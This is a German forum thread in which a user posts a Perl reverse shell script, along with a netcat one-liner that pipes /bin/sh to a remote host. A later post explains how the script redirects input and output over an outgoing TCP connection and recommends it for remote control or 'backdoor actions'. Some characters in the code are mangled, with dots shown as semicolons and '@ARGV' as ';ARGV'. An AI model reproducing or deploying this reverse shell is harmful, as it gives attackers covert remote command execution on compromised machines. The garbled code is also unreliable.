Vollständige Version anzeigen : [Perl] Little Reverse Shell


fred777
22.06.2010, 16:01

Ist vor kurzem entstanden, klar ginge auch
$nc -e /bin/sh host port
allerdings ist netcat nicht überall vorhanden..

Vondaher:

#!/usr/bin/perl
#...........................................................;#
# Reverse Shell 1;1 #
# °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°° °°°°°°°°°°°°°°°°°°°° #
# + Command Execution #
# + TCP Connection #
# #
# Usage: $ *~pl <host> <port> <command> #
# Ex : $ *~pl 127;0;0;1 777 start #
# #
# < j0k3 > (c) fred777;5x~to #
#...........................................................;#

use strict;
use warnings;
use Socket;
$|++;

intro();
my ($addr,$port,$comm) = ;ARGV;
exit unless($addr && $port && $comm);
my $proto = getprotobyname('tcp') || die "\nProtokoll: $!\n";
my $tar = inet_aton($addr);
my $in_addr = sockaddr_in($port,$tar);

print "\n Create Socket\n";

socket(SERV, PF_INET, SOCK_STREAM, $proto) || die "\nSocket: $!\n";
connect(SERV,$in_addr) || die "\nConnect: $!\n";
print " Create Shell\n";

if(!fork()) {

open(STDIN, ">&SERV");
open(STDOUT,">&SERV");
exec ($comm); exit;
}

sub intro {

print q {

#...........................................................;#
# Reverse Shell 1;1 #
# -;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-;-. #
# #
# + Command Execution #
# + TCP Connection #
# #
# - $ shell~pl <host> <port> <command> #
# #
# < j0k3 > (c) fred777;5x~to #
#...........................................................;#

}

}

Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Alex²
22.06.2010, 17:19

Was ich noch sagen wollte, bevor pyro in Rampage verfallen ist (er hats mir nun erlaubt) :lol:

Es wäre vielleicht nützlicher, wenn du genauer auf dein Programm eingehst, also was es ist und wozu es dient, wie es funktioniert. Quasi den Code näher an die User heran trägst, es gibt sicher viele die mit dem Begriff nichts anfangen können. Das ist (laut dem gepinnten Thread) die eigentliche Absicht dieses Bereiches.


fred777
22.06.2010, 17:55

Jop, kein Ding, also:
Die Reverse Shell baut auf eine ausgehende TCP Verbindung auf, bzw. zum Zielsystem.
Das ganze geschieht in Perl in meinem Script via Sockets. Sprich:

socket(SERV, PF_INET, SOCK_STREAM, $proto) || die "\nSocket: $!\n";
connect(SERV,$in_addr) || die "\nConnect: $!\n";

Ich erstelle erstmal ein Socket mit den entsprechenden Modulen, näheres dazu in der Socket Header Dokumentation. Dann verbinde ich zum Ziel, was in dem Fall dann unser Host ist.
Adresse und Port werden vorher in der Variablendeklarierung festgelegt.

Solange jetzt die Verbindung besteht, leiten wir die Standardausgaben und -Eingaben an unsere Connection weiter, so etwa unsere 'exec' Zeile, welche den Output eines Befehls an uns weiterleitet.

Sinnvoll z;B. bei einfachen Remotesteuerungen oder Backdooraktionen.
Das sollte erstmal langen ;)


Ähnliche Themen zu [Perl] Little Reverse Shell
  • Reverse Vid
    HI, was haltet ihr von diesem Video ? Hab ich mit zwei Freunden gemacht ;) ich finds eigentlich ziemlich geil.... Reverse Video (;youtube~com/watch?v=1A9M0RA97Xo) [...]

  • SQL shell down aber wie eigene shell erstellen
    hi ich bin auf folgendes gestossen CREATE PROCEDURE xp_cmdshell(;cmd varchar(255), ;Wait int = 0) AS --Create WScript;Shell object DECLARE ;result int, ;OLEResult int, ;RunResult int DECLARE ;ShellID int EXECUTE ;OLEResult = sp_OACreate 'WScript;Shell', ;ShellID OUT IF ;OLEResult <> [...]

  • [Perl] erste Schritte in Perl
    [ Perl - erste Schritte] Bemerkung: Perl ist eine sehr schöne Scriptsprache, da sie Plattformunabhänig ist und auf jedem System läuft, auf dem ein Perlinterpreter installiert ist. Man kann durch Perl besonders in Linux sehr viele Abläufe, z;b. Backups erstellen, einfach automatisieren. Hier [...]

  • MySQL Reverse Shell Problem
    (0 row(s) affected) Execution Time : 00:00:00:125 Transfer Time : 00:00:00:000 Total Time : 00:00:00:125 (0 row(s) affected) Execution Time : 00:00:00:140 Transfer Time : 00:00:00:000 Total Time : 00:00:00:140 (0 row(s) affected, 1 warning(s)) Execution Time : 00:00:00:156 Tr [...]



raid-rush.ws | Imprint & Contact pr